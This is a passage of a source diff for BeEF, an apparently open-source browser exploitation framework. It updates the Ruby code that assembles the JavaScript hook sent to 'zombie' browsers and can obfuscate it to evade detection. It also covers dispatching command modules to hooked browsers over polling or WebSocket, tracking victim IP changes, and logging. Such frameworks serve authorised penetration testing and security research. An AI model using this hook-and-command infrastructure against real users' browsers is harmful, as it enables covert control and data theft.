+        end
 
-      # @note create the command module to handle the response
-      command = @kclass.new(BeEF::Module.get_key_by_class(@kclass))  
-      command.build_callback_datastore(@http_params, @http_header, result, command_id, beefhook) 
-      command.session_id = beefhook 
-      if command.respond_to?(:post_execute)
-        command.post_execute
       end
 
-      # @note get/set details for datastore and log entry
-      command_friendly_name = command.friendlyname
-      (print_error "command friendly name is empty";return) if command_friendly_name.empty?
-      command_results = get_param(@data, 'results')
-      (print_error "command results are empty";return) if command_results.empty?
-      # @note save the command module results to the datastore and create a log entry
-      command_results = {'data' => command_results}
-      BeEF::Core::Models::Command.save_result(beefhook, command_id, command_friendly_name, command_results) 
 
     end
-    
-    # Returns parameter from hash
-    # @param [Hash] query Hash of data to return data from
-    # @param [String] key Key to search for and return inside `query`
-    # @return Value referenced in hash at the supplied key
-    def get_param(query, key)
-        return (query.class == Hash and query.has_key?(key)) ? query[key] : nil
-    end
-
   end
-    
-  
-end
-end
 end

core/main/handlers/hookedbrowsers.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -61,13 +51,25 @@ module Handlers
 
       # @note is a known browser so send instructions 
       else       
+        # @note Check if we haven't seen this browser for a while, log an event if we haven't
+        if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
+          BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
+        end
+
         # @note record the last poll from the browser
         hooked_browser.lastseen = Time.new.to_i
         
         # @note Check for a change in zombie IP and log an event
-        if hooked_browser.ip != request.ip
-          BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
-          hooked_browser.ip = request.ip
+        if config.get('beef.http.use_x_forward_for') == true
+          if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
+            hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
+          end
+        else
+          if hooked_browser.ip != request.ip
+           BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
+           hooked_browser.ip = request.ip
+          end
         end
       
         hooked_browser.count!

core/main/handlers/modules/beefjs.rb

@@ -1,106 +1,169 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-module Handlers
-module Modules
-  
-  # @note Purpose: avoid rewriting several times the same code.
-  module BeEFJS
-    
-    # Builds the default beefjs library (all default components of the library).
-    # @param [Object] req_host The request object
-    def build_beefjs!(req_host)
+  module Core
+    module Handlers
+      module Modules
 
-      # @note set up values required to construct beefjs
-      beefjs = '' 
-      # @note location of sub files      
-      beefjs_path = "#{$root_dir}/core/main/client/"
-      js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
+        # @note Purpose: avoid rewriting several times the same code.
+        module BeEFJS
 
-      # @note construct the beefjs string from file(s)
-      js_sub_files.each {|js_sub_file_name|
-        js_sub_file_abs_path = beefjs_path + js_sub_file_name 
-        beefjs << (File.read(js_sub_file_abs_path) + "\n\n") 
-      }
-      
-      # @note create the config for the hooked browser session
-      config = BeEF::Core::Configuration.instance
-      hook_session_name = config.get('beef.http.hook_session_name')
-      hook_session_config = BeEF::Core::Server.instance.to_h
+          # Builds the default beefjs library (all default components of the library).
+          # @param [Object] req_host The request object
+          def build_beefjs!(req_host)
+            config = BeEF::Core::Configuration.instance
+            # @note set up values required to construct beefjs
+            beef_js = ''
+            # @note location of sub files
+            beef_js_path = "#{$root_dir}/core/main/client/"
 
-      # @note if http_host="0.0.0.0" in config ini, use the host requested by client
-      if hook_session_config['beef_host'].eql? "0.0.0.0" 
-        hook_session_config['beef_host'] = req_host 
-        hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)  
-      end
-      
-      # @note populate place holders in the beefjs string and set the response body
-      eruby = Erubis::FastEruby.new(beefjs)
-      @body << eruby.evaluate(hook_session_config)
-  
-    end
-    
-    # Finds the path to js components
-    # @param [String] component Name of component
-    # @return [String|Boolean] Returns false if path was not found, otherwise returns component path
-    def find_beefjs_component_path(component)
-      component_path = component
-      component_path.gsub!(/beef./, '')
-      component_path.gsub!(/\./, '/')
-      component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
-      
-      return false if not File.exists? component_path
-      
-      component_path
-    end
-    
-    # Builds missing beefjs components.
-    # @param [Array] beefjs_components An array of component names
-    def build_missing_beefjs_components(beefjs_components)
-      # @note verifies that @beef_js_cmps is not nil to avoid bugs
-      @beef_js_cmps = '' if @beef_js_cmps.nil?
-      
-      if beefjs_components.is_a? String
-        beefjs_components_path = find_beefjs_component_path(beefjs_components)
-        raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
-        beefjs_components = {beefjs_components => beefjs_components_path} 
-      end
+            # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
+            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
 
-      beefjs_components.keys.each {|k|
-        next if @beef_js_cmps.include? beefjs_components[k]
-        
-        # @note path to the component
-        component_path = beefjs_components[k]
-        
-        # @note we output the component to the hooked browser
-        @body << File.read(component_path)+"\n\n"
-        
-        # @note finally we add the component to the list of components already generated so it does not get generated numerous times.
-        if @beef_js_cmps.eql? ''
-          @beef_js_cmps = component_path
-        else
-          @beef_js_cmps += ",#{component_path}"
+            # @note BeEF libraries: need Eruby evaluation and obfuscation
+            beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
+            # @note Load websocket library only if WS server is enabled in config.yaml
+            if config.get("beef.http.websocket.enable") == true
+              beef_js_sub_files << "websocket.js"
+            end
+
+            # @note antisnatchor: leave timeout.js as the last one!
+            beef_js_sub_files << "timeout.js"
+
+            ext_js_to_obfuscate = ''
+            ext_js_to_not_obfuscate = ''
+
+            # @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
+            # @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
+            ext_js_sub_files.each{ |ext_js_sub_file|
+              if config.get("beef.extension.evasion.enable")
+                if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
+                  print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
+                  # do not obfuscate the file
+                  ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                  ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+                else
+                  ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                  ext_js_to_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+                end
+              else
+                # Evasion is not enabled, do not obfuscate anything
+                ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+              end
+            }
+
+            # @note construct the beef_js string from file(s)
+            beef_js_sub_files.each { |beef_js_sub_file|
+              beef_js_sub_file_path = beef_js_path + beef_js_sub_file
+              beef_js << (File.read(beef_js_sub_file_path) + "\n\n")
+            }
+
+            # @note create the config for the hooked browser session
+            hook_session_config = BeEF::Core::Server.instance.to_h
+
+            # @note if http_host="0.0.0.0" in config ini, use the host requested by client
+            unless hook_session_config['beef_public'].nil?
+              if hook_session_config['beef_host'] != hook_session_config['beef_public']
+                hook_session_config['beef_host'] = hook_session_config['beef_public']
+                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_host']}/, hook_session_config['beef_public'])
+              end
+            end
+            if hook_session_config['beef_host'].eql? "0.0.0.0"
+              hook_session_config['beef_host'] = req_host
+              hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
+            end
+
+            # @note set the XHR-polling timeout
+            hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
+
+            # @note set the hook file path and BeEF's cookie name
+            hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+            hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
+
+            # @note if http_port <> public_port in config ini, use the public_port
+            unless hook_session_config['beef_public_port'].nil?
+              if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
+                hook_session_config['beef_port'] = hook_session_config['beef_public_port']
+                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
+                if hook_session_config['beef_public_port'] == '443'
+                  hook_session_config['beef_url'].sub!(/http:/, 'https:')
+                end
+              end
+            end
+
+            # @note Set some WebSocket properties
+            if config.get("beef.http.websocket.enable")
+              hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
+              hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
+              hook_session_config['ws_poll_timeout'] = config.get("beef.http.websocket.ws_poll_timeout")
+              hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
+            end
+
+            # @note populate place holders in the beef_js string and set the response body
+            eruby = Erubis::FastEruby.new(beef_js)
+            @hook = eruby.evaluate(hook_session_config)
+
+            if config.get("beef.extension.evasion.enable")
+              evasion = BeEF::Extension::Evasion::Evasion.instance
+              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
+            else
+              @final_hook = ext_js_to_not_obfuscate + @hook
+            end
+
+            # @note Return the final hook to be sent to the browser
+            @body << @final_hook
+
+          end
+
+          # Finds the path to js components
+          # @param [String] component Name of component
+          # @return [String|Boolean] Returns false if path was not found, otherwise returns component path
+          def find_beefjs_component_path(component)
+            component_path = component
+            component_path.gsub!(/beef./, '')
+            component_path.gsub!(/\./, '/')
+            component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
+
+            return false if not File.exists? component_path
+
+            component_path
+          end
+
+          # Builds missing beefjs components.
+          # @param [Array] beefjs_components An array of component names
+          def build_missing_beefjs_components(beefjs_components)
+            # @note verifies that @beef_js_cmps is not nil to avoid bugs
+            @beef_js_cmps = '' if @beef_js_cmps.nil?
+
+            if beefjs_components.is_a? String
+              beefjs_components_path = find_beefjs_component_path(beefjs_components)
+              raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
+              beefjs_components = {beefjs_components => beefjs_components_path}
+            end
+
+            beefjs_components.keys.each { |k|
+              next if @beef_js_cmps.include? beefjs_components[k]
+
+              # @note path to the component
+              component_path = beefjs_components[k]
+
+              # @note we output the component to the hooked browser
+              @body << File.read(component_path)+"\n\n"
+
+              # @note finally we add the component to the list of components already generated so it does not get generated numerous times.
+              if @beef_js_cmps.eql? ''
+                @beef_js_cmps = component_path
+              else
+                @beef_js_cmps += ",#{component_path}"
+              end
+            }
+          end
         end
-      }
+      end
     end
-
   end
-  
-end
-end
-end
 end

core/main/handlers/modules/command.rb

@@ -1,70 +1,80 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-module Handlers
-module Modules
+  module Core
+    module Handlers
+      module Modules
 
-  module Command
+        module Command
 
-    # Adds the command module instructions to a hooked browser's http response. 
-    # @param [Object] command Command object
-    # @param [Object] hooked_browser Hooked Browser object
-    def add_command_instructions(command, hooked_browser)
+          # Adds the command module instructions to a hooked browser's http response.
+          # @param [Object] command Command object
+          # @param [Object] hooked_browser Hooked Browser object
+          def add_command_instructions(command, hooked_browser)
+            (print_error "hooked_browser is nil"; return) if hooked_browser.nil?
+            (print_error "hooked_browser.session is nil"; return) if hooked_browser.session.nil?
+            (print_error "hooked_browser is nil"; return) if command.nil?
+            (print_error "hooked_browser.command_module_id is nil"; return) if command.command_module_id.nil?
 
-      (print_error "hooked_browser is nil";return) if hooked_browser.nil?
-      (print_error "hooked_browser.session is nil";return) if hooked_browser.session.nil?
-      (print_error "hooked_browser is nil";return) if command.nil?
-      (print_error "hooked_browser.command_module_id is nil";return) if command.command_module_id.nil?
+            config = BeEF::Core::Configuration.instance
+            # @note get the command module
+            command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)
+            (print_error "command_module is nil"; return) if command_module.nil?
+            (print_error "command_module.path is nil"; return) if command_module.path.nil?
 
-      # @note get the command module
-      command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)      
-      (print_error "command_module is nil";return) if command_module.nil?
-      (print_error "command_module.path is nil";return) if command_module.path.nil?
+            if (command_module.path.match(/^Dynamic/))
+              command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
+            else
+              key = BeEF::Module.get_key_by_database_id(command.command_module_id)
+              command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
+            end
+
+            command_module.command_id = command.id
+            command_module.session_id = hooked_browser.session
+            command_module.build_datastore(command.data)
+            command_module.pre_send
+
+            build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
+
+            ws = BeEF::Core::Websocket::Websocket.instance
+
+            if config.get("beef.extension.evasion.enable")
+              evasion = BeEF::Extension::Evasion::Evasion.instance
+              @output = evasion.obfuscate(command_module.output)
+            else
+              @output = command_module.output
+            end
+
+            #todo antisnatchor: remove this gsub crap adding some hook packing.
+            if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
+              #content = command_module.output.gsub('//
+              #//
+              #//   Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+              #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
+              #//   See the file 'doc/COPYING' for copying permission
+              #//
+              #//', "")
+              ws.send(@output, hooked_browser.session)
+            else
+              @body << @output + "\n\n"
+            end
+            # @note prints the event to the console
+            if BeEF::Settings.console?
+              name = command_module.friendlyname || kclass
+              print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module [id:#{command.id}, name:'#{name}']"
+            end
+
+            # @note flag that the command has been sent to the hooked browser
+            command.instructions_sent = true
+            command.save
+          end
+
+        end
 
-      if(command_module.path.match(/^Dynamic/))
-         command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
-      else
-         key = BeEF::Module.get_key_by_database_id(command.command_module_id) 
-         command_module = BeEF::Core::Command.const_get(BeEF::Core::Configuration.instance.get("beef.module.#{key}.class")).new(key)
       end
-
-      command_module.command_id = command.id
-      command_module.session_id = hooked_browser.session
-      command_module.build_datastore(command.data)
-      command_module.pre_send
-
-      build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
-
-      @body << command_module.output + "\n\n"
-      
-      # @note prints the event to the console
-      if BeEF::Settings.console?
-      name = command_module.friendlyname || kclass
-      print_info "Hooked browser #{hooked_browser.ip} has been sent instructions from command module '#{name}'"
-      end
-
-      # @note flag that the command has been sent to the hooked browser
-      command.instructions_sent = true 
-      command.save
     end
-
   end
-
-end
-end
-end
 end

core/main/logger.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
@@ -24,6 +14,10 @@ module Core
     # Constructor
     def initialize
       @logs = BeEF::Core::Models::Log
+      @config = BeEF::Core::Configuration.instance
+
+      # if notifications are enabled create a new instance
+      @notifications = BeEF::Extension::Notifications::Notifications unless @config.get('beef.extension.notifications.enable') == false
     end
   
     # Registers a new event in the logs
@@ -34,6 +28,9 @@ module Core
     def register(from, event, hb = 0)
       # type conversion to enforce standards
       hb = hb.to_i
+
+      # get time now
+      time_now = Time.now
       
       # arguments type checking
       raise Exception::TypeError, '"from" needs to be a string' if not from.string?
@@ -41,7 +38,12 @@ module Core
       raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer?
       
       # logging the new event into the database
-      @logs.new(:type => "#{from}", :event => "#{event}", :date => Time.now, :hooked_browser_id => hb).save
+      @logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save
+
+      # if notifications are enabled send the info there too
+      if @notifications
+        @notifications.new(from, event, time_now, hb)
+      end
       
       # return
       true

core/main/migration.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/models/browserdetails.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -62,7 +52,7 @@ module Models
     
       browserdetails
     end
-  
+ 
     #
     # Returns the icon representing the browser type the
     # hooked browser is using (i.e. Firefox, Internet Explorer)
@@ -94,9 +84,10 @@ module Models
       return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
       return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
       return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
+      return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
       return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
       return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
       return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
@@ -105,6 +96,35 @@ module Models
       BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
     end
   
+    #
+    # Returns the icon representing the hardware the
+    # zombie is running on (i.e. iPhone, BlackBerry)
+    #
+    def self.hw_icon(session_id)
+
+      ua_string = get(session_id, 'BrowserReportedName')
+      hardware  = get(session_id, 'Hardware')
+      return BeEF::Core::Constants::Hardware::HW_VM_IMG if hardware =~ /Virtual Machine/
+      return BeEF::Core::Constants::Hardware::HW_LAPTOP_IMG if hardware =~ /Laptop/
+      return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
+
+      return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_BLACKBERRY_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_KINDLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_KINDLE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_NOKIA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_NOKIA_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_MOTOROLA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_MOTOROLA_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_HTC_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_HTC_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_GOOGLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_GOOGLE_UA_STR
+	return BeEF::Core::Constants::Hardware::HW_ERICSSON_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ERICSSON_UA_STR
+
+      BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG
+
+    end
+
   end
 
 end

core/main/models/command.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
@@ -65,11 +55,11 @@ module Models
       command.save
 
       # @note log that the result was returned
-      BeEF::Core::Logger.instance.register('Command', "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'", hooked_browser_id)
+      BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id)
 
       # @note prints the event into the console
       if BeEF::Settings.console?
-        print_info "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'"
+        print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']"
       end
     end
 

core/main/models/commandmodule.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/models/hookedbrowser.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/models/log.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/models/optioncache.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core

core/main/models/result.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
